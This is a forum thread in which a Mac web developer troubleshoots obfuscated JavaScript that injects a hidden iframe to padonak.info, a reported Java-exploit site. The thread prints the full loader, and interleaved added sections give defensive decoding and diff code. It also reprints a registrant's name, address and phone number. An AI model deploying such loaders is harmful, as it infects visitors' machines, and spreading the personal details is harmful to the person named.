Do I have a real virus? Oh geezus...

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
Years ago there was a famous virus that had something to do with http://padonack.info...

When I'm surfing my own site, sometimes mysterious javascript inserts itself into the beginning of my document (I can tell by watching the activity window in Safari). This is happening on plain html pages that have no includes or anything. I've been a web dev since '95 so I know a few things...but I can't explain this yet.

Except that it's from my own computer. Both computers on my network are having the same problem (outside computers are not).

I would venture that either I have a real virus on my machines or it's on my router (which I'm trying to find the manual for).

Kind of worried...it's clear that they are accessing info via a java applet on their end...at a page named 'xxx.htm'...

Anybody else ever see something like this on their end?
 

Mitthrawnuruodo

Moderator emeritus
Mar 10, 2004
13,594
141
Bergen, Norway
I'm sorry, but I have no idea what you're talking about... unless your webserver (Apache?) adds something, or you subscribe to an ad service (or whatever), JavaScript does not insert itself into pages...

If you're running this on Macs with OS X (which you don't say anything about, but I'll assume you are), it's highly unlikely a virus is to blame, you'd actually have the first known infected machines...
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
Mitthrawnuruodo said:
I'm sorry, but I have no idea what you're talking about... unless your webserver (Apache?) adds something, or you subscribe to an ad service (or whatever), JavaScript does not insert itself into pages...

If you're running this on Macs with OS X (which you don't say anything about, but I'll assume you are), it's highly unlikely a virus is to blame, you'd actually have the first known infected machines...
Sorry, I'm freaking out here...

I'm on OSX 10.3.7 using Safari 1.2.4...

My Apache is not configured to add anything. My AdBlock has never posed any problems of any sort...

My webhost claims it's me...and from what I can determine, the problem is coming from my end of things (since others are not experiencing the problem while visiting my site).

Is it possible that the router could be doing this? I don't know much about them...

Trying to figure this out...is there a way with Apple Firewall to block outgoing communications with a particular ip address? I can't find this...
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
I'm surfing with Adblock.css and my plugins turned off and it's still happening. And with Firefox too...

This is not good...

PHP:
<script language=javascript>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,49,32,119,105,100,116,104,61,49,32,115,114,99,61,104,116,116,112,58,47,47,112,97,100,111,110,97,107,46,105,110,102,111,47,102,97,47,32,62,60,47,105,102,114,97,109,101,62,39,41,59))</script>
which spells out "document.write('');"

It does this on static html pages too...
 

broken_keyboard

macrumors 65816
Apr 19, 2004
1,144
0
Secret Moon base
From what I can see it will execute the following:

document.write('<iframe height=1 width=1 src=http://padonak.info/fa/ ></iframe>');

Searching the web, it seems that site may contain a jar file that uses a JVM exploit to compromise your machine.
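The decoding broken_keyboard did by hand can be done statically, without ever handing the script to eval. The following is an added example, not code from the thread: it takes the injected snippet exactly as posted above, maps every `String.fromCharCode(...)` argument list back to text, pulls the `src` out of any iframe the decoded text would write, and flags the 1x1 hidden-iframe pattern. The function names and the triage fields are my own.

```javascript
// Added example (not from the thread): decode eval(String.fromCharCode(...))
// obfuscation statically, without evaluating the script.

// Sample input: the injected <script> exactly as posted in the thread.
const INJECTED_SCRIPT =
  "<script language=javascript>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,49,32,119,105,100,116,104,61,49,32,115,114,99,61,104,116,116,112,58,47,47,112,97,100,111,110,97,107,46,105,110,102,111,47,102,97,47,32,62,60,47,105,102,114,97,109,101,62,39,41,59))</script>";

// Find every String.fromCharCode(n, n, ...) call and map the code points
// back to text. Returns one decoded string per call, in source order.
function decodeFromCharCode(script) {
  const re = /String\.fromCharCode\(\s*([\d\s,]+?)\s*\)/g;
  const out = [];
  let m;
  while ((m = re.exec(script)) !== null) {
    const codes = m[1]
      .split(",")
      .map(s => parseInt(s.trim(), 10))
      .filter(n => Number.isInteger(n));
    out.push(String.fromCharCode(...codes));
  }
  return out;
}

// Pull src= values out of any <iframe> the decoded text would write.
function extractIframeSources(decoded) {
  const re = /<iframe\b[^>]*\bsrc\s*=\s*["']?([^\s"'>]+)/gi;
  const srcs = [];
  let m;
  while ((m = re.exec(decoded)) !== null) srcs.push(m[1]);
  return srcs;
}

// Triage summary a defender would record for a captured page sample.
function triage(script) {
  const decoded = decodeFromCharCode(script);
  const iframes = decoded.flatMap(extractIframeSources);
  return {
    usesEval: /\beval\s*\(/.test(script),
    decoded,
    iframes,
    // 1x1 (or 0x0) iframes are the classic drive-by loader shape.
    hiddenIframe: decoded.some(d =>
      /<iframe[^>]*\b(height|width)\s*=\s*["']?[01]\b/i.test(d)),
  };
}

// Stand-alone run: print the triage report for the posted snippet.
console.log(JSON.stringify(triage(INJECTED_SCRIPT), null, 2));
```

Running it reproduces the decoded `document.write('<iframe height=1 width=1 src=http://padonak.info/fa/ ></iframe>');` line and lists `http://padonak.info/fa/` as the iframe target; nothing from the snippet is executed, so the same routine is safe to run over any captured page source.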
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
Yes, that's why I'm pretty freaked out by this... If you search on padonak and hangup you'll find more info...

I'm trying to get the webhost to dig deeper into the matter but yesterday they flat out said it's me, not them.

Actually, if there are any mac people out there who might be able to take a look at this - just to see if they can get the same javascript code that I'm getting perhaps they could IM me?

Thanks...
 

Applespider

macrumors G4
I'm on my work PC at the moment but did find some info about recent padonak attacks that you (or others) might find useful. It appears that its payload is Windows specific but that on some PCs it was getting round Norton etc.

This seems to be the most common explanation - not sure if it triggers anything with you. Most people say that it ended up being installed onto their webserver, particularly when they ran forum software. Posting comments on the folder led to the malicious include.

We were maliciously attacked from a padonak.info website that uses IFRAME to download the "proc.jar" java archive and run MainApp.class. This, again through IFRAME, loads other classes which contain the JavaByteVerify exploit.
http://msmvps.com/donna/archive/2004/07/03/9463.aspx

Good luck
 

Mitthrawnuruodo

Moderator emeritus
Mar 10, 2004
13,594
141
Bergen, Norway
From this site:
The gaming website I admin for was hit last week with a padonak.info object. Although at first glance it allowed the JavaByteVerify to enter, it also allowed a backdoor trojan to come in and infect any computer not well guarded with an anti-virus program/firewall. One person found it got around his Norton, router AND his Black Ice to try leaving a "Bloodhound .6 worm" exploit. With another, it dropped in a "Trojan.Win32.Paketes".

The padonak.info object installs on the taskbar and if you click on it, it will disable the ActiveX preventing the page from working properly. But it allows other nasty buggers to get in too.

I have been combing the web since this attack on Dec 22 and could not find anything under "padonak.info". Finally went to Wilders Security forums where a "padobot" and Russian "HangUp" hacker group were mentioned back in October. Then a Google search using the HangUp name.
Sounds very much like a Windows problem, first and foremost... how it can affect a Mac is beyond me, even more after skimming through this forum...

Maybe this is a good time to actually run Virex or another AV software and see what they find... ;) ...or ask if your Webservice runs on a PC...?
 

redeye be

macrumors 65816
Jan 27, 2005
1,138
0
BXL
You could always call this guy and ask him what's up
Domain Name: PADONAK.INFO
Registrant Name: Jester Norman
Registrant Organization: SplitInfinity
Registrant Street1: 13553 Poway Rd.
Registrant City: San Diego
Registrant State/Province: CA
Registrant Postal Code: 92064
Registrant Country: US
Registrant Phone: +1.8586792814
If it is a virus you would make the history books! Wouldn't that be great? :eek:

Good luck.
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
Applespider said:
This seems to be the most common explanation - not sure if it triggers anything with you. Most people say that it ended up being installed onto their webserver, particularly when they ran forum software. Posting comments on the folder led to the malicious include.
Yep...the problem I have is that it's interfering with my css for whatever reason. I can see the iframe loading onto the page as it's leaving a little space...

I don't have any kind of system for people to insert comments, etc onto my site...I'm not running a blog...

So, do I breathe a little easier thinking that it's something server-side and not me? I hope so...I don't want to be the first...

Thanks...
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
Mitthrawnuruodo said:
By the way: What is the address to your site? It would be interesting to see first hand...
I really don't like putting my url into forums...IM me on ichat and I'll give you the link...
 

Mitthrawnuruodo

Moderator emeritus
Mar 10, 2004
13,594
141
Bergen, Norway
jvaska said:
I really don't like putting my url into forums...IM me on ichat and I'll give you the link...vvvaska...
I don't really get that, why have a secret homepage...? :rolleyes:

But, anyhow, what I really want to know is the system your page is running on... Can you run your homepage through Whats that site running? (it needs the whole URL, including the http://)...?

My site (http://www.geek.no/), according to this test, runs on Linux, with an Apache/2.0.51 (Debian GNU/Linux) DAV/2 FrontPage/5.0.2.2635 PHP/4.3.8-12 mod_ssl/2.0.51 OpenSSL/0.9.7d webserver which is owned by Dataguard AS

Now if your webhost runs on an OS in the Windows family and maybe even an IIS server then we have a very strong suspect, and your machine is most likely as healthy as ever... ;)
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
It's not secret, I just don't want to post it in a forum. I never do...

Apache/1.3.31 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.8 FrontPage/5.0.2.2634a mod_ssl/2.8.19 OpenSSL/0.9.7a
 

Mitthrawnuruodo

Moderator emeritus
Mar 10, 2004
13,594
141
Bergen, Norway
jvaska said:
It's not secret, I just don't want to post it in a forum. I never do...

Apache/1.3.31 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.8 FrontPage/5.0.2.2634a mod_ssl/2.8.19 OpenSSL/0.9.7a
Fair enough... ;)

Hmmm... quite a little problem this... have you tried a search for a proc.jar file...?

And, what happens if you make a REALLY simple html file and upload that... does that too suddenly appear to have a foreign iframe in it...?
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
Mitthrawnuruodo said:
Hmmm... quite a little problem this... have you tried a search for a proc.jar file...?

And, what happens if you make a REALLY simple html file and upload that... does that too suddenly appear to have a foreign iframe in it...?
Don't have proc.jar on my system (or search doesn't find it)...very simple html files do have the iframe...

Normally, my support is very fast. They are clearly thinking this one over before they get back to me. Fingers crossed they find the culprit...

Thanks, v
 

Mitthrawnuruodo

Moderator emeritus
Mar 10, 2004
13,594
141
Bergen, Norway
jvaska said:
Don't have proc.jar on my system (or search doesn't find it)...very simple html files do have the iframe...

Normally, my support is very fast. They are clearly thinking this one over before they get back to me. Fingers crossed they find the culprit...

Thanks, v
Well, if it didn't have an iframe when you view it through localhost on your own machine, and therefore has to be clean when leaving your machine, then it's most likely something that gets added by your webhost's server...
 

Mitthrawnuruodo

Moderator emeritus
Mar 10, 2004
13,594
141
Bergen, Norway
Ok, here's an idea: Make a simple, but typical html page, with a likewise simple css file. E-mail them to me at einstein<at>c2i<dot>net with a specific Subject (that's my "spam"-account so most incoming mail from unknowns will be caught by the junk filter) and I'll upload them on my site and post back the link. If that's clean and your webhost still claims it's you, you can give them that link and say: Why isn't the iframe/script added when my file is uploaded here, then...???
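The procedure proposed above (upload a known-clean file, fetch it from several places, see where the foreign element first shows up) is the standard way to localize an injection to the file, the local machine, the network path or the host. The following is an added example, not code from the thread or from anyone in it: it diffs the active elements (`<script>`, `<iframe>`) of the page as authored against the page as served, and turns a constructed set of vantage-point results into a verdict about where the injection happens. The sample page, the injected snippet and the vantage-point names are constructed for the example; the decision rules in `whereIsItInjected` are my own reading of the thread's reasoning.

```javascript
// Added example (not from the thread): locate where a script/iframe is being
// injected by comparing the authored file with what each vantage point serves.

// Constructed sample: a minimal authored page (plain html + one css link).
const AUTHORED = [
  "<html><head><title>test</title>",
  '<link rel="stylesheet" href="site.css"></head>',
  "<body><p>hello</p></body></html>",
].join("\n");

// Constructed sample: the same page with an obfuscated loader prepended on
// the way to the browser (charcodes shortened; the shape is what matters).
const INJECTION =
  "<script language=javascript>eval(String.fromCharCode(100,111,99))</script>";
const SERVED_TAMPERED = INJECTION + AUTHORED;

// Collect <script>...</script> and <iframe> elements from HTML, tolerant of
// sloppy markup (no quotes around attributes, self-closing iframes).
function activeElements(html) {
  const re = /<(script|iframe)\b[^>]*>[\s\S]*?<\/\1\s*>|<iframe\b[^>]*\/?>/gi;
  return (html.match(re) || []).map(s => s.replace(/\s+/g, " ").trim());
}

// Elements present in the served copy but absent from what was uploaded.
function injectedElements(authored, served) {
  const known = new Set(activeElements(authored));
  return activeElements(served).filter(el => !known.has(el));
}

// Vantage points ordered from your disk outwards. `results` maps each to
// true if the served copy carried injected elements there.
function whereIsItInjected(results) {
  if (results["local file"]) return "the authored file itself";
  if (results["localhost apache"]) return "your local machine (web server or browser side)";
  if (results["webhost from LAN"] && results["webhost from outside"]) return "the webhost";
  if (results["webhost from LAN"]) return "the path between your LAN and the webhost (router/ISP)";
  if (results["webhost from outside"]) return "something specific to the outside vantage point";
  return "no injection observed";
}

// Stand-alone run: what the thread reports (outside computers are clean).
const observed = {
  "local file": injectedElements(AUTHORED, AUTHORED).length > 0,
  "localhost apache": false,                                        // constructed
  "webhost from LAN": injectedElements(AUTHORED, SERVED_TAMPERED).length > 0,
  "webhost from outside": false,                                    // constructed
};
console.log("injected:", injectedElements(AUTHORED, SERVED_TAMPERED));
console.log("verdict:", whereIsItInjected(observed));
```

In practice each `results` entry comes from fetching the same uploaded file from that vantage point (curl from the LAN, curl from an outside box, the local Apache) and running `injectedElements` on the body; the comparison is on extracted elements rather than raw bytes so that harmless differences in whitespace or headers do not mask the one element that matters.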
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
Confirmed...this is a local issue...trying to go forward from here...

Hope this is not a virus...

It's affecting Safari and Firefox...not IE...
 

MisterMe

macrumors G4
Jul 17, 2002
10,650
28
USA
jvaska said:
Years ago there was a famous virus that had something to do with http://padonack.info...

When I surfing my own site sometimes mysterious javascript inserts itself into the beginning of my document (I can tell by watching the activity window in Safari). This is happening on plain html pages that have no includes or anything. I'm a web dev since '95 so I know a few things...but I can't explain this yet.

Except, that it's from my own computer. Both computers on my network are having the same problem (outside computers are not).

I would venture that either I have a real virus on my machines or it's on my router (which I'm trying to find the manual for).

Kind of worried...it's clear that they are accessing info via a java applet on their end...at a page named 'xxx.htm'...

Anybody else ever see something like this on their end?
You do not have a virus. If you did, you would be the first MacOS X user to get one. The only way for that to happen is for you to have written it, which you did not. At any rate, I don't entirely understand the nature of your problem. However, in the last couple of weeks, I have heard of ISPs inserting pop-ups between websites and surfers without the cooperation of the websites. If your site is hosted on your local computer, you can disconnect your computer from the 'net to see if the mysterious code disappears.
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
The same problem is on my two machines...I hate to say this...but is it?

I'm not sure what to do right now. Should I just backup and reinstall?

Oh geezus...
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
MisterMe said:
You do not have a virus. If you did, you would be the first MacOS X user to get one. The only way for that to happen is for you to have written it, which you did not. At any rate, I don't entirely understand the nature of your problem. However, in the last couple of weeks, I have heard of ISPs inserting pop-ups between websites and surfers without the cooperation of the websites. If your site is hosted on your local computer, you can disconnect your computer from the 'net to see if the mysterious code disappears.
Site is not hosted locally...

Would a host insert javascript that clearly drives to a documented hack site?

Nobody can reproduce this. PCs and Macs now...nobody else has this except for me. On two machines in my network...
 

Mitthrawnuruodo

Moderator emeritus
Mar 10, 2004
13,594
141
Bergen, Norway
Let's see if we can't find the problem (if it really is local, which I strongly doubt; have you checked with your ISP...?):
Do you have any "funny" plugins/addons/extensions that you use, either installed directly in your browser (like the Adblock extension in Firefox) or something in your home folder ~/Library/Internet Plug-Ins or systemwide /Library/Internet Plug-Ins ?
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
Mitthrawnuruodo said:
Some (free) hosts add a script (or some sort of frame) to all pages making them display ads...
My host is not of that caliber...they wouldn't do that...